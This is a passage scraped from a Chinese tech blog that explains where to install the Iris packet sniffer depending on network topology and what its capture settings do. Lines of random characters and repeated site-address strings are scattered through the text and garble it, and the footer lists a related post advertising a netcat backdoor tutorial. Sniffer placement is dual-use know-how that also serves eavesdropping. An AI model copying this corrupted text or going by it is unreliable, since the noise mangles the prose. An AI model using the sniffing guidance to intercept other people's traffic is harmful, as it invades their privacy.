M5}9wIdReq"S/yIXPUB技术博客　　作为一个嗅探器，它只能捕捉通过所在机器的数据包，因此如果要使它能捕捉尽可能多的信息，安装前应该对所处网络的结构有所了解。例如，在环形拓扑结构的网络中，安装在其中任一台机都可以捕捉到其它机器的信息包（当然不是全部），而对于使用交换机连接的交换网络，很有可能就无法捕捉到其它两台机器间通讯的数据，而只能捕捉到与本机有关的信息；又例如，如果想检测一个防火墙的过滤效果，可以在防火墙的内外安装Iris，捕捉信息，进行比较。　　
6L4f BAu p*yq
　　3.【配置Iris】
#Y+L4^A1iTQ+aP(x,k#Mblog.ixpub.net
?F?g6z/Kblog.ixpub.net　　Capture（捕获）
9X?k%b?6A9jX C
　　Run continuously ：当存储数据缓冲区不够时，Iris将覆盖原来的数据包。
7M.kP!Wz}8t%Ogh!TjGwI
　　Stop capture after filling buffer：当存储数据缓冲区满了时，Iris将停止进行数据包截获，并停止纪录。
8C,{~D0m
XIoL)W:jT3aEblog.ixpub.net　　Load this filter at startup：捕获功能启动时导入过滤文件并应用，这样可以进行命令行方式的调试。
blog.ixpub.net,Hr!MU'SJYJ
　　Scroll packets list to ensure last packet visible：一般要选中，就是将新捕获的数据包附在以前捕获结果的后面并向前滚动。

　　Use Address Book：使用Address Book来保存mac地址，并记住mac地址和网络主机名。而Ip也会被用netbios名字显示。　　
IXPUB�

（申精）黑客实战之攻击篇——用NC打造成自己的简单后门

全部脚印 不留脚印 留下脚印:

全部脚印不留脚印留下脚印: